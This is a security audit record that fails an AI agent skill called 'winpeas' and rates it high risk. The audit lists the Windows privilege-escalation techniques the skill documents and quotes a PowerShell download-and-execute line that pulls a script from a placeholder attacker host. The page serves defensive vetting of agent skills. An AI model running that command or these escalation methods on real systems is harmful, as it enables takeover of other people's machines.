skills/aeondave/malskill/winpeas/Gen Agent Trust Hub

winpeas

Fail

Audited by Gen Agent Trust Hub on Sep 15, 2026

Risk Level: HIGHPRIVILEGE_ESCALATIONREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [PRIVILEGE_ESCALATION]: The skill documents numerous methods for escalating privileges to SYSTEM, including exploiting unquoted service paths, weak NTFS permissions, and abusing specific Windows privileges like SeImpersonatePrivilege using techniques like PrintSpoofer.\n- [REMOTE_CODE_EXECUTION]: The instructions include a specific PowerShell pattern for downloading and executing remote scripts in memory using IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/winPEAS.ps1').\n- [COMMAND_EXECUTION]: Provides commands to reconfigure system services and registry keys, such as sc config and reg add, which are used to redirect service execution to malicious payloads.\n- [EXTERNAL_DOWNLOADS]: The skill encourages downloading potentially malicious content from untrusted remote servers represented by the http://ATTACKER/ placeholder.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Sep 15, 2026, 09:56 AM
Security Audit — agent-trust-hub — winpeas